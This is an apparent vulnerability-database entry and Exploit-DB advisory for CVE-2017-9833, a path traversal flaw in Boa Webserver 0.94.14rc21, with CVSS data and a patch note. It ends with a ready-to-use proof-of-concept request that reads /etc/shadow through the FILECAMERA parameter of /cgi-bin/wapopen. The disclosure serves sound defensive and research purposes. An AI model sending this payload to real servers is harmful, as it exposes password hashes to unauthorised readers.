Vulnerability in BOA Webserver 0.94.14

vendor:

Boa Webserver

by:

Miguel Mendez Z

7,5

CVSS

HIGH

Arbitrary file access

CWE

Product Name: Boa Webserver

Affected Version From: Boa Webserver 0.94.14rc21

Affected Version To: Boa Webserver 0.94.14rc21

Patch Exists: Yes

Related CWE: CVE-2017-9833

CPE: a:boa:boa_webserver:0.94.14rc21

Metasploit: N/A

Other Scripts: N/A

Tags: boa,lfr,lfi,cve,cve2017,edb

CVSS Metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Nuclei References: https://www.exploit-db.com/exploits/42290, https://nvd.nist.gov/vuln/detail/CVE-2017-9833, https://pastebin.com/raw/rt7LJvyF, https://www.exploit-db.com/exploits/42290/

Nuclei Metadata: {'max-request': 1, 'vendor': 'boa', 'product': 'boa'}

Platforms Tested: Unix

2017

Vulnerability in BOA Webserver 0.94.14

BOA Web Server 0.94.14 is susceptible to arbitrary file access. The server allows the injection of "../.." using the FILECAMERA variable sent by GET to read files with root privileges and without using access credentials.

Mitigation:

The vendor has released a patch to address this vulnerability.

Source

Exploit-DB raw data:

BOA Web Server 0.94.14 - Access to arbitrary files as privileges

Title: Vulnerability in BOA Webserver 0.94.14
Date: 20-06-2017
Status: Vendor contacted, patch available
Scope: Arbitrary file access
Platforms: Unix
Author: Miguel Mendez Z
Vendor Homepage: http://www.boa.org
Version: Boa Webserver 0.94.14rc21
CVE: CVE-2017-9833


Vulnerability description
-------------------------
-We can read any file located on the server
The server allows the injection of "../.." using the FILECAMERA variable sent by GET to read files with root privileges. Without using access credentials

Vulnerable variable:
FILECAMERA=../../etc/shadow%00

Exploit link:
/cgi-bin/wapopen?B1=OK&NO=CAM_16&REFRESH_TIME=Auto_00&FILECAMERA=../../etc/shadow%00&REFRESH_HTML=auto.htm&ONLOAD_HTML=onload.htm&STREAMING_HTML=streaming.htm&NAME=admin&PWD=admin&PIC_SIZE=0

Poc:
http://127.0.0.1/cgi-bin/wapopen?B1=OK&NO=CAM_16&REFRESH_TIME=Auto_00&FILECAMERA=../../etc/shadow%00&REFRESH_HTML=auto.htm&ONLOAD_HTML=onload.htm&STREAMING_HTML=streaming.htm&NAME=admin&PWD=admin&PIC_SIZE=0